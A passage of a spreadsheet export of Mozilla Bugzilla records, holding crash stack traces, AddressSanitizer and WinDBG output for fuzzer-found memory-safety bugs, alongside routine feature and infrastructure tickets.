    #35 0x7f317c9cfecb in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f317637a017 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #37 0x7f3176ca5c88 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #38 0x7f3176ca5c88 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #39 0x7f3176ca7aaa in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #40 0x7f3176c930e1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #41 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #42 0x7f3174ced50d in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3815:7
    #43 0x7f3176c931d7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:12
    #44 0x7f3176c931d7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb68c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f318ad51c54 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7f3178c5f84b in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7f3178bda31f in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7f3178bda31f in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:240
    #5 0x7f3178bda31f in operator new /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1400
    #6 0x7f3178bda31f in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1429
    #7 0x7f3178be9ee4 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:946:14
    #8 0x7f3178beeb01 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1400:10
    #9 0x7f3178bee5a0 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1410:10
    #10 0x7f3178d83598 in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:136:12
    #11 0x7f3178d83598 in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:94
    #12 0x7f3178d83598 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*, mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5066
    #13 0x7f3178d868b2 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5031:10
    #14 0x7f3178d868b2 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5047
    #15 0x7f3178d868b2 in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5685
    #16 0x7f3178d69fd1 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11046:9
    #17 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #18 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #19 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #20 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #21 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #22 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #23 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #24 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #25 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #26 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #27 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #28 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #29 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #30 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #31 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #32 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #33 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #34 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #35 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #36 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #37 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #38 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #39 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #40 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #41 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #42 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #43 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #44 0x7f3178d7340b in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12081:3
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsIFrame.h:676:43 in GetContent
Shadow bytes around the buggy address:
  0x0c4a80071680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c4a800716d0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8007172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7691==ABORTING</t>
        </is>
      </c>
      <c r="X2159" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2160">
      <c r="A2160" t="n">
        <v>1480443</v>
      </c>
      <c r="B2160" t="inlineStr">
        <is>
          <t>2018-08-02 07:53:37 -0700</t>
        </is>
      </c>
      <c r="C2160" t="inlineStr">
        <is>
          <t>Enable FastBlock by default on Nightly</t>
        </is>
      </c>
      <c r="D2160" t="inlineStr">
        <is>
          <t>2018-09-23 09:31:40 -0700</t>
        </is>
      </c>
      <c r="E2160" t="n">
        <v>1</v>
      </c>
      <c r="F2160" t="n">
        <v>1</v>
      </c>
      <c r="G2160" t="n">
        <v>3</v>
      </c>
      <c r="H2160" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2160" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2160" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2160" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2160" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2160" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2160" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2160" t="inlineStr">
        <is>
          <t>[necko-triaged]</t>
        </is>
      </c>
      <c r="Q2160" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2160" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2160" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T2160" t="n">
        <v>1</v>
      </c>
      <c r="U2160" t="n">
        <v>0</v>
      </c>
      <c r="V2160" t="n">
        <v>24</v>
      </c>
      <c r="W2160" t="inlineStr">
        <is>
          <t>With the Content Blocking UI going live in Nightly right now (bug 1476217) we probably want to flip the FastBlock pref as well to get some early input.</t>
        </is>
      </c>
      <c r="X2160" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2161">
      <c r="A2161" t="n">
        <v>781276</v>
      </c>
      <c r="B2161" t="inlineStr">
        <is>
          <t>2012-08-08 11:18:14 -0700</t>
        </is>
      </c>
      <c r="C2161" t="inlineStr">
        <is>
          <t>[redesign] Dashboards</t>
        </is>
      </c>
      <c r="D2161" t="inlineStr">
        <is>
          <t>2012-09-12 17:18:17 -0700</t>
        </is>
      </c>
      <c r="E2161" t="n">
        <v>1</v>
      </c>
      <c r="F2161" t="n">
        <v>1</v>
      </c>
      <c r="G2161" t="n">
        <v>5</v>
      </c>
      <c r="H2161" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2161" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2161" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2161" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2161" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2161" t="inlineStr">
        <is>
          <t>u=contributor c=dashboards  p=2</t>
        </is>
      </c>
      <c r="Q2161" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2161" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2161" t="inlineStr">
        <is>
          <t>2012.17</t>
        </is>
      </c>
      <c r="T2161" t="n">
        <v>1</v>
      </c>
      <c r="U2161" t="n">
        <v>0</v>
      </c>
      <c r="V2161" t="n">
        <v>4</v>
      </c>
      <c r="W2161" t="inlineStr">
        <is>
          <t>Apply new style to /&lt;locale&gt;/localization, /en-US/contributors and /kpi/dashboard
There are no mockups yet.
See bug 762255 for the latest design</t>
        </is>
      </c>
      <c r="X2161" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2162">
      <c r="A2162" t="n">
        <v>1437126</v>
      </c>
      <c r="B2162" t="inlineStr">
        <is>
          <t>2018-02-09 09:52:46 -0800</t>
        </is>
      </c>
      <c r="C2162" t="inlineStr">
        <is>
          <t>drag/dropping image from one tab into another should drop the image, not the URL.</t>
        </is>
      </c>
      <c r="D2162" t="inlineStr">
        <is>
          <t>2024-06-30 18:22:09 -0700</t>
        </is>
      </c>
      <c r="E2162" t="n">
        <v>1</v>
      </c>
      <c r="F2162" t="n">
        <v>1</v>
      </c>
      <c r="G2162" t="n">
        <v>3</v>
      </c>
      <c r="H2162" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2162" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2162" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K2162" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2162" t="inlineStr">
        <is>
          <t>NEW</t>
        </is>
      </c>
      <c r="O2162" t="inlineStr"/>
      <c r="P2162" t="inlineStr"/>
      <c r="Q2162" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R2162" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2162" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2162" t="n">
        <v>1</v>
      </c>
      <c r="U2162" t="n">
        <v>1</v>
      </c>
      <c r="V2162" t="n">
        <v>13</v>
      </c>
      <c r="W2162" t="inlineStr">
        <is>
          <t>Feature request:
If you've got an image in one tab and an input box that accepts it in another (e.g. Slack) then dragging an image out of one tab into another should bring over the image, not the URL.</t>
        </is>
      </c>
      <c r="X2162" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2163">
      <c r="A2163" t="n">
        <v>583520</v>
      </c>
      <c r="B2163" t="inlineStr">
        <is>
          <t>2010-07-31 16:13:08 -0700</t>
        </is>
      </c>
      <c r="C2163" t="inlineStr">
        <is>
          <t>Mac crash with fuzzed font in data: URL</t>
        </is>
      </c>
      <c r="D2163" t="inlineStr">
        <is>
          <t>2011-01-27 11:28:56 -0800</t>
        </is>
      </c>
      <c r="E2163" t="n">
        <v>1</v>
      </c>
      <c r="F2163" t="n">
        <v>1</v>
      </c>
      <c r="G2163" t="n">
        <v>3</v>
      </c>
      <c r="H2163" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2163" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2163" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2163" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L2163" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2163" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2163" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2163" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:investigating]</t>
        </is>
      </c>
      <c r="Q2163" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2163" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2163" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2163" t="n">
        <v>1</v>
      </c>
      <c r="U2163" t="n">
        <v>0</v>
      </c>
      <c r="V2163" t="n">
        <v>38</v>
      </c>
      <c r="W2163" t="inlineStr">
        <is>
          <t>Created attachment 461832
testcase (crash)
Marc Schoenefeld reported the following to security@mozilla.org.  I confirmed that it crashed for me on Firefox 3.6.8, but NOT on trunk.  I died before Crash Reporter came up, but I saved the relevant portion of the Apple crash report, which I'll attach.
Crash Wrangler told Marc that it was a double free issue, but I can't tell if that's consistent with what I got.  sg:crit? until we know for sure.
----------
Hi,
my font fuzzer triggered the following on Ffx 3.6.8/OSX10.6
The testcase is attached as html file embedding the
malformed font in a data: url tag. The Crashwrangler
wrapped said it is exploitable, so I thought I better forward
this.
Summary from CW:
Faulty glyph (id:38) outline detected - replacing with a space/null
glyph - in memory font kind
Fri Jul 30 12:20:24 maeckes2.local firefox-bin[10483] &lt;Error&gt;:
CGBitmapContextInfoCreate: unable to allocate 10584 bytes for bitmap data
objc[10483]: FREED(id): message autorelease sent to freed object=0x1f2de010
[..]
---
exception=EXC_BAD_INSTRUCTION:signal=4:is_exploitable=yes:instruction_disassembly=:instruction_address=0x0000000097db24b4:access_type=:access_address=0x0000000000000000:
Illegal instruction at 0x0000000097db24b4, probably a exploitable issue.
Cheers
Marc</t>
        </is>
      </c>
      <c r="X2163" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2164">
      <c r="A2164" t="n">
        <v>413309</v>
      </c>
      <c r="B2164" t="inlineStr">
        <is>
          <t>2008-01-21 00:44:35 -0800</t>
        </is>
      </c>
      <c r="C2164" t="inlineStr">
        <is>
          <t>Talos machines not reporting performance numbers</t>
        </is>
      </c>
      <c r="D2164" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2164" t="n">
        <v>1</v>
      </c>
      <c r="F2164" t="n">
        <v>1</v>
      </c>
      <c r="G2164" t="n">
        <v>5</v>
      </c>
      <c r="H2164" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2164" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2164" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2164" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2164" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2164" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2164" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2164" t="inlineStr"/>
      <c r="Q2164" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2164" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2164" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2164" t="n">
        <v>1</v>
      </c>
      <c r="U2164" t="n">
        <v>0</v>
      </c>
      <c r="V2164" t="n">
        <v>12</v>
      </c>
      <c r="W2164" t="inlineStr">
        <is>
          <t>Not seeing any data on Talos machines. Just "L C".
Could be related to bug 413305. Won't open the tree until perf numbers are back, but understand this may not be an ops issue.</t>
        </is>
      </c>
      <c r="X2164" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2165">
      <c r="A2165" t="n">
        <v>1284690</v>
      </c>
      <c r="B2165" t="inlineStr">
        <is>
          <t>2016-07-05 16:16:50 -0700</t>
        </is>
      </c>
      <c r="C2165" t="inlineStr">
        <is>
          <t>use-after-free in DOMSVGLength</t>
        </is>
      </c>
      <c r="D2165" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:59 -0700</t>
        </is>
      </c>
      <c r="E2165" t="n">
        <v>1</v>
      </c>
      <c r="F2165" t="n">
        <v>1</v>
      </c>
      <c r="G2165" t="n">
        <v>3</v>
      </c>
      <c r="H2165" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2165" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2165" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2165" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2165" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2165" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N2165" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2165" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2165" t="inlineStr">
        <is>
          <t>[fixed in bug 1288228][adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q2165" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2165" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2165" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2165" t="n">
        <v>1</v>
      </c>
      <c r="U2165" t="n">
        <v>0</v>
      </c>
      <c r="V2165" t="n">
        <v>33</v>
      </c>
      <c r="W2165" t="inlineStr">
        <is>
          <t>Created attachment 8768230
Stack Text from WinDBG
While fuzzing the latest Firefox Nightly build (Built from https://hg.mozilla.org/mozilla-central/rev/c9a70b64f2faa264296f0cc90d68a2ee2bac6ac5) with cross_fuzz (http://lcamtuf.coredump.cx/cross_fuzz/), I encountered a null ptr dereference / access violation / crash @ nsINode::GetComposedDoc.
cross_fuzz command line:
file:///d:/cross_fuzz_v3/cross_fuzz_randomized_20110105_seed.html#8088
time to crash:
10-15 minutes
FAULTING_IP: 
xul!nsINode::GetComposedDoc+0 [c:\builds\moz2_slave\m-cen-w64-ntly-000000000000000\build\src\obj-firefox\dist\include\nsinode.h @ 536]
00007ffc`a0e53af8 f7411800080000  test    dword ptr [rcx+18h],800h
EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
.exr 0xffffffffffffffff
ExceptionAddress: 00007ffca0e53af8 (xul!nsINode::GetComposedDoc)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: 0000000000000018
Attempt to read from address 0000000000000018
FAULTING_THREAD:  000000000000153c
PROCESS_NAME:  firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1:  0000000000000000
EXCEPTION_PARAMETER2:  0000000000000018
READ_ADDRESS:  0000000000000018 
FOLLOWUP_IP: 
xul!nsINode::GetComposedDoc+0 [c:\builds\moz2_slave\m-cen-w64-ntly-000000000000000\build\src\obj-firefox\dist\include\nsinode.h @ 536]
00007ffc`a0e53af8 f7411800080000  test    dword ptr [rcx+18h],800h
NTGLOBALFLAG:  70
APPLICATION_VERIFIER_FLAGS:  0
BUGCHECK_STR:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS:  NULL_CLASS_PTR_DEREFERENCE
DEFAULT_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE
LAST_CONTROL_TRANSFER:  from 00007ffca0fb90c9 to 00007ffca0e53af8
FAULTING_SOURCE_CODE:  
No source found for 'c:\builds\moz2_slave\m-cen-w64-ntly-000000000000000\build\src\obj-firefox\dist\include\nsinode.h'
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  xul!nsINode::GetComposedDoc+0
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: xul
IMAGE_NAME:  xul.dll
